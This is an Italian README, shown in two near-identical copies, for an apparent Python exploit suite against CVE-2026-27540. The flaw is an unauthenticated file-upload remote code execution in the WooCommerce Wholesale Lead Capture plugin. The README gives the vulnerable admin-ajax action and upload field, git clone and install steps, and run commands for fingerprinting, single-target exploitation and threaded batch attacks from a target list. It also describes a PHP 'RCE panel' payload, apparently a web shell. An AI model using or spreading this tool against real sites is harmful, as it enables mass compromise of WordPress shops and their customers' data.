
Suite di exploit in Python per CVE-2026-27540, un RCE tramite upload di file non autenticato nel plugin WooCommerce Wholesale Lead Capture, con fingerprinting, targeting in batch e un payload per pannello RCE.
WooCommerce Wholesale Lead Capture (WWLC) — Caricamento file non autenticato → RCE
| Prodotto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Versione | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — upload handler protetto |
| Auth | Unauthenticated |
| Vettore | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (multipart upload) |
| Percorso di scrittura | Directory uploads di WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| File | Ruolo |
|---|---|
winrarzips_brand.py | Banner CMD (by winrarzips) |
wwlc_core.py | Motore di exploit |
CVE-2026-27540-Suite.py | CLI batch + singolo target |
payloads/x7-panel.php | Pannello RCE |
requirements.txt | Dipendenze |
❌ Liste di target, risultati di scansione e URL dei pannelli non presenti nel repo.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — Caricamento file non autenticato → RCE
| Prodotto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Affected | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — upload handler rafforzato |
| Auth | Unauthenticated |
| Vettore | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (multipart upload) |
| Percorso di scrittura | Directory uploads di WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| File | Ruolo |
|---|---|
winrarzips_brand.py | Banner CMD (by winrarzips) |
wwlc_core.py | Core dell'exploit |
CVE-2026-27540-Suite.py | CLI batch + singolo target |
payloads/x7-panel.php | Payload del pannello RCE |
requirements.txt | Dipendenze |
❌ Liste di target, risultati di scansione e URL dei pannelli live non inclusi.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed